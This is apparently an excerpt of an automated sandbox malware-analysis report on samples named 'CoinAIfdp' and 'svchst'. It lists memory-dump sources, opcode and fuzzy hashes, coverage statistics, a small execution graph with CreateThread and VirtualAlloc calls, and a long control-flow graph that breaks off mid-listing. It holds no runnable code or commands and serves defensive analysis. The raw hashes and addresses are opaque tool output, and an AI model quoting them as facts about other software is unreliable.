                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 337f6cab6eab0046ca5665e8ebb2224a3b5538e4c24ac49f847a282c592e50d5
                                        • Instruction ID: 4eb261a77051ceb04a4144020abfb794b2f4707b1e36a4766fc2ef5b07fcab41
                                        • Opcode Fuzzy Hash: 337f6cab6eab0046ca5665e8ebb2224a3b5538e4c24ac49f847a282c592e50d5
                                        • Instruction Fuzzy Hash: 67E0EEB4E04308EFCB94DFA8D404A9DBBB5BB48300F5081AA9804A3300D7399A91DF80
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c347c3db759c281d9c2a0595b08b06828967f5d377a168e54f588f06bef11c56
                                        • Instruction ID: 52709621109c0f31d85bcae4b0c2e37dfd657929b5f1021cb67f4f5e876d61da
                                        • Opcode Fuzzy Hash: c347c3db759c281d9c2a0595b08b06828967f5d377a168e54f588f06bef11c56
                                        • Instruction Fuzzy Hash: DFE07574E04208EFCB94DFA8E545A9DBBF4FB48310F1081A9D81997360D7356A44DF81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8fd3cad510b41544d48c047d87cbd4bff36f9561aedfdac3eb1417f41c902b84
                                        • Instruction ID: 2a356d0130d789c1489f2bb42c18fdd00c117e6b52d613411ca0dc6e2d79efc3
                                        • Opcode Fuzzy Hash: 8fd3cad510b41544d48c047d87cbd4bff36f9561aedfdac3eb1417f41c902b84
                                        • Instruction Fuzzy Hash: 8FE07578E04208EFCB94DFA8D445A9DBBF4FB48310F1081A9D81897360E7359A45DF81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 230022557bb4c99a0a74c9d698c1c2953865d80854eefe086e2fe70997add887
                                        • Instruction ID: ebf79f756a44c18e5d3a3f79679fcc3aec7daa389cffca25605b3199e493ebf4
                                        • Opcode Fuzzy Hash: 230022557bb4c99a0a74c9d698c1c2953865d80854eefe086e2fe70997add887
                                        • Instruction Fuzzy Hash: 40E01275D00308EBCB16EFA4D504AACBBB5AB44310F1081AAE89026350C73A9A94EB80
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33e29dc1a72a11d682f88951667ef3e8f881569390c45464372d0269470ce8a8
                                        • Instruction ID: d2c400bb6fa56461fd366c08da2dc5401312b2b29293dc54e089859a98f34c94
                                        • Opcode Fuzzy Hash: 33e29dc1a72a11d682f88951667ef3e8f881569390c45464372d0269470ce8a8
                                        • Instruction Fuzzy Hash: E0E09274E04208EFCB94DFA8D44569DBBB5BB48300F5081A9C818A3750D7395A45DF81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0db85058a5d873bb8abbcc9a209a8a3e5737a0489ebd661f45ef970acf1dd611
                                        • Instruction ID: 2fdb02ba351dd6e8ede6ee39ff97bcddf5a10472fad0060ff46726c2cd237bdc
                                        • Opcode Fuzzy Hash: 0db85058a5d873bb8abbcc9a209a8a3e5737a0489ebd661f45ef970acf1dd611
                                        • Instruction Fuzzy Hash: 08E01274E0420CAFCB94DFA8E506AADBBF0BB49300F0081A98808A3740D7381A44DF80
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 391f43e639bf676632e9032a258ed13ec0aadafc4bcb18b5ae238585e0fbc139
                                        • Instruction ID: 3500b6c6a54aa841e27f0b8481b9a7319007963ba212053c97dab6504f3229e8
                                        • Opcode Fuzzy Hash: 391f43e639bf676632e9032a258ed13ec0aadafc4bcb18b5ae238585e0fbc139
                                        • Instruction Fuzzy Hash: 76E046B4905209AFC7A0CFB4E8457ECBBF0BB09314F0045AAE804D3600E3790A05EB41
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d18a1906933657ab8fad12b5e7e7a64b6489ac712d4b7761d52824a52a4fa4e1
                                        • Instruction ID: d4e9e9b180049d549a61639adc98c2853e8d8bb99d6b10f4899288bc53fc41b1
                                        • Opcode Fuzzy Hash: d18a1906933657ab8fad12b5e7e7a64b6489ac712d4b7761d52824a52a4fa4e1
                                        • Instruction Fuzzy Hash: 8BD017B690120CEBDB11EFA1D500A9A77F9EB46200F8005B98504D3660EB764E04ABA2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd40fdfa5eadbf2ddedcc0c5ca1e6a1abc285ad338316d5c895ab1d13deb29ba
                                        • Instruction ID: 258da742f5d25ba69cb972aced5c6ba7c19b94c4260d899a0f642ca752ef62a6
                                        • Opcode Fuzzy Hash: bd40fdfa5eadbf2ddedcc0c5ca1e6a1abc285ad338316d5c895ab1d13deb29ba
                                        • Instruction Fuzzy Hash: FFD0C7B2800208EFCB10DFB0D805A8A7BB8FB4A200F8004F98804C3650EB360E08EB82
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89f41144a56258c595835dd0bb2293cb006ac2a3d2ad96edb9c3b8c4268d9b30
                                        • Instruction ID: dd78efb9422643a3512b3c5b14f6b2368ab2d8afe233fce1cec05bcf0acb9e9c
                                        • Opcode Fuzzy Hash: 89f41144a56258c595835dd0bb2293cb006ac2a3d2ad96edb9c3b8c4268d9b30
                                        • Instruction Fuzzy Hash: 74E08C34800208EFCB24EF90E80599DBFB5BB05301F5081A8EC4422350C7354A55EB84
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27bcbf402ca5aaa2236868e6e72260c224285b7d0b65abb9c745080d4441d7b8
                                        • Instruction ID: 7c9149a65ef2cd1ddc18e2a09f82e3f8ea16dff8da7381394a7317cd3f4f91b7
                                        • Opcode Fuzzy Hash: 27bcbf402ca5aaa2236868e6e72260c224285b7d0b65abb9c745080d4441d7b8
                                        • Instruction Fuzzy Hash: 10E09274E00208AFCB54DF98E545A9DBBB4EB88314F5481A9DC1897340D736AE46DB81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84ed2aa6c6e5bbf0935fa2c8dca30679eacbf3575445fd895b4b53b92a1a63e6
                                        • Instruction ID: 4f99d3c9a5ecda8ea716fa579f55df0a96007f6d172e9d797b2a9bbfb5e0d49e
                                        • Opcode Fuzzy Hash: 84ed2aa6c6e5bbf0935fa2c8dca30679eacbf3575445fd895b4b53b92a1a63e6
                                        • Instruction Fuzzy Hash: 2AE01275900208EFCB55DF64D504E597B78FB09311F104198E90857321D732DD54EB95
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f67b174eda8c54aea0c37b230e83abe038c682bd7b0f7c86badd2c4b1774151
                                        • Instruction ID: c7c5b6db0f002b23e944728aef76b6caebbf08d8d99e36458f38531d1e06c943
                                        • Opcode Fuzzy Hash: 4f67b174eda8c54aea0c37b230e83abe038c682bd7b0f7c86badd2c4b1774151
                                        • Instruction Fuzzy Hash: 7CF04E7990522CCFDB219F20CD48BDCBBB5AB48301F1040EA9849A3295D7354FC5DF61
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c8e7e07f7de351fdbc2946fe38a1e08ab4dc6808c78c0940db163f675afa63e
                                        • Instruction ID: a6630edab32a65c5f8e46681995601c0b05d3ab20afd4797275b451d9f767bfa
                                        • Opcode Fuzzy Hash: 3c8e7e07f7de351fdbc2946fe38a1e08ab4dc6808c78c0940db163f675afa63e
                                        • Instruction Fuzzy Hash: 42E01274900208EFC754DFA4E54595DBBB4FB49316F5081E8D80857760C731AE44DBC5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6289933bdfc89e5ea0267fdb66f57bf092755f9feaaa373dec1ec4accbf6f8fa
                                        • Instruction ID: 211cebf5e6a922a492ae403cbed7022af921c04a94cf1bbe5e15a6efdbff8c49
                                        • Opcode Fuzzy Hash: 6289933bdfc89e5ea0267fdb66f57bf092755f9feaaa373dec1ec4accbf6f8fa
                                        • Instruction Fuzzy Hash: 6FE0CAB4E02228CFDB25DF24E8887D8BBB1BB09301F5048E9D189A3244C7B88EC0CE01
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b862fee53fa0ff35e7fa5139a1577d2a321b8576b0daf5ae2ff62674fc054119
                                        • Instruction ID: 036eaa12ec216c28186d09609adfa04f3db9496ccf12633fe30a31ebce2a46ac
                                        • Opcode Fuzzy Hash: b862fee53fa0ff35e7fa5139a1577d2a321b8576b0daf5ae2ff62674fc054119
                                        • Instruction Fuzzy Hash: C5E01278904208DBC714DFA4E545A6DBB74FB45314F5481ADCC0957740C7325E46DB81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb8aafa0b41fb65973b61ae4b4f9352befc42de11e5f309ba3c663fd6eda8e58
                                        • Instruction ID: 0ca857d56f5d185f5c39fd876540ecbb1e3c29bd14d31aa8c162035280f8be47
                                        • Opcode Fuzzy Hash: fb8aafa0b41fb65973b61ae4b4f9352befc42de11e5f309ba3c663fd6eda8e58
                                        • Instruction Fuzzy Hash: E5E08CB19082949EF7729770E00B7663FB49712329F05016DD884C699AC3BE048ADB41
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ea445681a6ada82f3b3d288598beba94166ed86c323de161175beef9628a82b
                                        • Instruction ID: c27120621f7d38646abc6840feea7415c3069bcd44a7dd828fe1f0103e9963d4
                                        • Opcode Fuzzy Hash: 9ea445681a6ada82f3b3d288598beba94166ed86c323de161175beef9628a82b
                                        • Instruction Fuzzy Hash: B4E04E789012189BDB21DF90DD49ADEBBB1BB08300F108199D549A6264D7365E81DF00
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08014efffadc3157daa426c5e415bccec55b8981fbd204546311ad4e5760e2bf
                                        • Instruction ID: 6b571d9a84ec7d39304fd78d7c694047530a632d33ea0eb492184bdbab52efc7
                                        • Opcode Fuzzy Hash: 08014efffadc3157daa426c5e415bccec55b8981fbd204546311ad4e5760e2bf
                                        • Instruction Fuzzy Hash: D5D0C775905208EFC790DFA8D50975DB7F8EB05315F5045A99C04D3700D7755E00D791
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 588ed3543a7e9e6aa8d7af69bbade4f3365d74160e1fbe7cae4c66c3d5d3a2ce
                                        • Instruction ID: b4123ae41cfd39d1282a004addfa24afcad861bcb0f23f92af33d4233219fe01
                                        • Opcode Fuzzy Hash: 588ed3543a7e9e6aa8d7af69bbade4f3365d74160e1fbe7cae4c66c3d5d3a2ce
                                        • Instruction Fuzzy Hash: 88D022360483058FE3A05B24B40A33133F8B702701F44263AC84882C20D3BF444BC762
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b455b44de9e4da3827f1103ef89025b3fbbddbc3390699fa144a77fd6e9cf19
                                        • Instruction ID: 720e9ca8390484b5f9421987e9169b97f83fb6ea0abb09303923a419872dc66f
                                        • Opcode Fuzzy Hash: 5b455b44de9e4da3827f1103ef89025b3fbbddbc3390699fa144a77fd6e9cf19
                                        • Instruction Fuzzy Hash: 33D05E74C0424CDBCB64EFA4A50A66CBFB4BB01201F4001A9C88462744D7790A59DB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84c8136fa11a3a978231b3e717ac31ddfde1e6c49d50c159c48e89e5fff2ed98
                                        • Instruction ID: c62823bf5a3617efd0dfe53178285863064c4fec1a75de25ec9ad1cd4f3b7170
                                        • Opcode Fuzzy Hash: 84c8136fa11a3a978231b3e717ac31ddfde1e6c49d50c159c48e89e5fff2ed98
                                        • Instruction Fuzzy Hash: 59D012B24803458BE7B54B65E86D36DB7B59702319F48057D9C8484966E37E0504CB40
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a62a1e88d711727fc7459aa16fee8e47ca70ddc99d5c99556d6ab1b87b8b0e0b
                                        • Instruction ID: 4d2f7c4d7bd5f0e835be00256269128059aca403589d2cc4ed1e157e30092dd6
                                        • Opcode Fuzzy Hash: a62a1e88d711727fc7459aa16fee8e47ca70ddc99d5c99556d6ab1b87b8b0e0b
                                        • Instruction Fuzzy Hash: A3D0C77140829459F77267A4F00B7623EBC5301329F44006DD9D8C1ECEC7BF5889C795
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3452a8ae2a8929776a6ff212429e922d6ac3cbfedfb7b35f483a9a420bfa73f
                                        • Instruction ID: 9042e50c4a50aef8782f8527a66cc2da91ca219eb2f1b4d1557a2efd51d1a900
                                        • Opcode Fuzzy Hash: e3452a8ae2a8929776a6ff212429e922d6ac3cbfedfb7b35f483a9a420bfa73f
                                        • Instruction Fuzzy Hash: A3B022320003088BC2B02F80F00E33232BCA30232AF800838C80C80C208BFF0808C380
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e7f4c28e7881f6142a95bece30e000bc619430a8658264256582da4e4054830
                                        • Instruction ID: c9b81d9d1b23802847849a65e17c91140d0eb9d1152d220f2b0c82298d2a0490
                                        • Opcode Fuzzy Hash: 9e7f4c28e7881f6142a95bece30e000bc619430a8658264256582da4e4054830
                                        • Instruction Fuzzy Hash: CCC012B09001089FE720DB64CE89BBA7775ABC4304F048099A24AA2218CB389C80CA24
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93935a2fdb0f1d6badcdfa494c4dab9d3599cc1d21c74dfe524481026dfa61c4
                                        • Instruction ID: 560b002be31156905b89cc6c1b407ddc4262846fd83d969e8b68a05d80a647d3
                                        • Opcode Fuzzy Hash: 93935a2fdb0f1d6badcdfa494c4dab9d3599cc1d21c74dfe524481026dfa61c4
                                        • Instruction Fuzzy Hash: B3D0C970945248CFDB10CF88D44879CBBF1EB09312F50489ED485A2305C3758C84CF01
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1eb22b6624686fb07d2328dde8056695c744365d74f1da75b408e22386501ef
                                        • Instruction ID: 195eafdd49261666537e348c54789d5b6e2ab46f2b6c5c8fc2c498c5dbf082ce
                                        • Opcode Fuzzy Hash: b1eb22b6624686fb07d2328dde8056695c744365d74f1da75b408e22386501ef
                                        • Instruction Fuzzy Hash: 1AC00238A46319CBEB219B10DC8DB9DBB35BB89705F204085D84D363D5C6755D85CF00
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eed882b1aae1ad672c8dd15e8ca6e2805cace9a19537170506c81ea0f5a5fe54
                                        • Instruction ID: efa8fd8cd68307cd71d1850c4b355088003697d1af823efab1c440670f66d380
                                        • Opcode Fuzzy Hash: eed882b1aae1ad672c8dd15e8ca6e2805cace9a19537170506c81ea0f5a5fe54
                                        • Instruction Fuzzy Hash: 86C00234804219CFDF224B50CD88B98BB75BB48305F104085945E662618A355D94DF50

                                        Execution Graph

                                        Execution Coverage:11.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:6
                                        Total number of Limit Nodes:0
                                        execution_graph 15654 5074040 15655 507408d CreateThread 15654->15655 15656 507410f 15655->15656 15657 5073e18 15658 5073e60 VirtualAlloc 15657->15658 15659 5073ecc 15658->15659

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 e88b70-e88b9e 1 e88ba0 0->1 2 e88ba5-e88cc4 0->2 1->2 5 e88cd3-e88cdf 2->5 6 e88cc6-e88ccd call e8b2d1 2->6 7 e88ce1 5->7 8 e88ce6-e88ceb 5->8 6->5 7->8 9 e88ced-e88cf9 8->9 10 e88d23-e88d6c 8->10 11 e88cfb 9->11 12 e88d00-e88d1e 9->12 18 e88d6e 10->18 19 e88d73-e88f8c 10->19 11->12 13 e8a1d0-e8a1d6 12->13 15 e8a1d8-e8a1f8 13->15 16 e8a201 13->16 15->16 21 e8a202 16->21 18->19 42 e899bc-e899c8 19->42 21->21 43 e899ce-e89a06 42->43 44 e88f91-e88f9d 42->44 53 e89ab5-e89abb 43->53 45 e88f9f 44->45 46 e88fa4-e890c9 44->46 45->46 79 e89109-e89192 46->79 80 e890cb-e89103 46->80 54 e89a0b-e89a36 53->54 55 e89ac1-e89af9 53->55 64 e89a42-e89a5d 54->64 65 e89cf8-e89cfe 55->65 66 e89a5f-e89a63 64->66 67 e89a90-e89ab2 64->67 69 e89afe-e89c29 65->69 70 e89d04-e89d4c 65->70 66->67 71 e89a65-e89a8d 66->71 67->53 120 e89c2b-e89c94 69->120 121 e89c96-e89c9a 69->121 77 e89d4e-e89dc1 70->77 78 e89dc7-e89e12 70->78 71->67 77->78 99 e8a19a-e8a1a0 78->99 106 e891a1-e89225 79->106 107 e89194-e8919c 79->107 80->79 101 e8a1a6-e8a1ce 99->101 102 e89e17-e89e99 99->102 101->13 122 e89e9b-e89eb6 102->122 123 e89ec1-e89ecd 102->123 142 e89234-e892b8 106->142 143 e89227-e8922f 106->143 110 e899ad-e899b9 107->110 110->42 136 e89cdf-e89cf5 120->136 124 e89ccc-e89cde 121->124 125 e89c9c-e89cca 121->125 122->123 126 e89ecf 123->126 127 e89ed4-e89ee0 123->127 124->136 125->136 126->127 132 e89ee2-e89eee 127->132 133 e89ef3-e89f02 127->133 137 e8a181-e8a197 132->137 139 e89f0b-e8a162 133->139 140 e89f04 133->140 136->65 137->99 168 e8a16d-e8a179 139->168 140->139 144 e8a0ad-e8a0ea 140->144 145 e8a03f-e8a0a8 140->145 146 e89f11-e89f4f 140->146 147 e89fd1-e8a03a 140->147 148 e89f54-e89fcc 140->148 181 e892ba-e892c2 142->181 182 e892c7-e8934b 142->182 143->110 169 e8a133-e8a139 144->169 145->168 146->168 147->168 148->168 168->137 172 e8a13b-e8a145 169->172 173 e8a0ec-e8a11f 169->173 172->168 178 e8a121 173->178 179 e8a126-e8a130 173->179 178->179 179->169 181->110 188 e8935a-e893de 182->188 189 e8934d-e89355 182->189 195 e893ed-e89471 188->195 196 e893e0-e893e8 188->196 189->110 202 e89480-e89504 195->202 203 e89473-e8947b 195->203 196->110 209 e89513-e89597 202->209 210 e89506-e8950e 202->210 203->110 216 e89599-e895a1 209->216 217 e895a6-e8962a 209->217 210->110 216->110 223 e89639-e896bd 217->223 224 e8962c-e89634 217->224 230 e896cc-e89750 223->230 231 e896bf-e896c7 223->231 224->110 237 e8975f-e897e3 230->237 238 e89752-e8975a 230->238 231->110 244 e897f2-e89876 237->244 245 e897e5-e897ed 237->245 238->110 251 e89878-e89880 244->251 252 e89885-e89909 244->252 245->110 251->110 258 e89918-e8999c 252->258 259 e8990b-e89913 252->259 265 e899a8-e899aa 258->265 266 e8999e-e899a6 258->266 259->110 265->110 266->110
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$2
                                        • API String ID: 0-2664012858
                                        • Opcode ID: 2c007c479f3ef8ee7c64027eef94626595ddf3cd316c2fd0eeb0210436cfcf9d
                                        • Instruction ID: 6402bf3e3f67949477fbc67cabbcd579ef131fa086c57075d33433f5292304f8
                                        • Opcode Fuzzy Hash: 2c007c479f3ef8ee7c64027eef94626595ddf3cd316c2fd0eeb0210436cfcf9d
                                        • Instruction Fuzzy Hash: 38D2E2B4A012288FDB64EF69D884B9DBBB6FB89304F1091E9D50DA7355DB309E85CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 268 e8a204-e8a2ac 275 e8a2b2-e8a375 268->275 276 e8a384-e8a3cc 268->276 275->276 306 e8a377-e8a381 275->306 281 e8a54c-e8a600 276->281 282 e8a3d2-e8a414 276->282 310 e8a6bf-e8a6f9 281->310 311 e8a606-e8a6bd 281->311 290 e8a531-e8a540 282->290 291 e8a431-e8a440 290->291 292 e8a546-e8a547 290->292 296 e8a442 291->296 297 e8a447-e8a4b9 291->297 294 e8a886-e8a8db 292->294 314 e8ab74-e8aba2 294->314 296->297 307 e8a4bb 297->307 308 e8a4c0-e8a526 297->308 306->276 307->308 344 e8a528 308->344 345 e8a52b 308->345 324 e8a700-e8a709 310->324 311->324 321 e8aba8-e8abaf 314->321 322 e8a8e0-e8a921 314->322 387 e8abb1 call e8d4b8 321->387 388 e8abb1 call e8d4b1 321->388 330 e8a92a-e8a92b 322->330 331 e8a923 322->331 328 e8a871-e8a880 324->328 326 e8abb7-e8abd3 352 e8abdb 326->352 328->294 333 e8a70e-e8a71d 328->333 343 e8ab6e 330->343 331->330 335 e8ab08-e8ab1a 331->335 336 e8a9aa-e8aa08 331->336 337 e8ab2a-e8ab63 331->337 338 e8aa0d-e8aa72 331->338 339 e8a930-e8a942 331->339 340 e8aac1-e8ab06 331->340 341 e8a955-e8a9a5 331->341 342 e8aa77-e8aabc 331->342 350 e8a71f 333->350 351 e8a724-e8a7a5 333->351 348 e8ab1c 335->348 349 e8ab21-e8ab28 335->349 336->343 337->343 338->343 346 e8a949-e8a950 339->346 347 e8a944 339->347 340->343 341->343 342->343 343->314 344->345 345->290 346->343 347->346 348->349 349->343 350->351 377 e8a80c-e8a837 351->377 378 e8a7a7-e8a7d2 351->378 381 e8a839 377->381 382 e8a83e-e8a860 377->382 379 e8a7d9-e8a80a 378->379 380 e8a7d4 